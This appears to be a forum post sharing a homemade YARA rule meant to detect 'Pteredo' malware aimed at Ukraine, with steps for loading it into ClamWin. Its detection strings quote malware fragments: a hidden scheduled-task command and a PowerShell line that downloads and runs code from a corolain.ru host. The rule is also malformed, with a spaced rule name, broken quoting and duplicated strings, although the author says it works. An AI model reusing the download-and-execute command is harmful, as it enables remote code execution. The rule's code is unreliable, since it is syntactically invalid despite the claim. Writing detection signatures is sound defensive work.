Below is a Yara signature for a new Russian backdoor targeting Ukraine computers. I didn't get any scan errors, so it should work. Copy the file to a new Notepad file from the word rule to the ending } and save it as a file named Pteredo.yar in the ClamWin database folder. Save it in All Files format and make sure there is nothing in the name except Pteredo.yar only. After you save it, scan a file with ClamWin to make sure it works. If there is a problem, please accept my apologies, and delete the file from the ClamWin database folder.

Unlike the usual mdb or hdb hash signatures, Yara sigs should keep for a long time, so keep it around--it may come in handy if you take your laptop to Ukraine.

Regards,

rule indications of Russian Pteredo malware targeting Ukraine
{
strings:
$a = "createObject("Shell.Application").ShellExecute "SCHTASKS", "/CREATE /sc minute /mo 10 /tn " + """UDPSync"" /tr ""wscript.exe """ + hailJPT + """" & " jewels //b joking //e VBScript joyful "" /F ", "" , "" , 0"
$b = ""wscript "[USERNAME]\lubszfpsqcrblebyb.tbi" //e:VBScript /w /ylq /ib /bxk //b /pgs""
$c = ""wscript "[USERNAME]\lubszfpsqcrblebyb.tbi" //e:VBScript /w /ylq /ib /bxk //b /pgs""
$d = "cvjABuNZjtPirKYVchnpGVop = "$tmp = $(New-Object net.webclient).DownloadString('https://'+ [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru') +'/get.php'); Invoke-Expression $tmp""
$e = "wscript "[USERPROFILE]\atwuzxsjiobk.ql" //e:VBScript /tfj /vy /g /cjr /rxia //b /pyvc"
condition:
any of them
}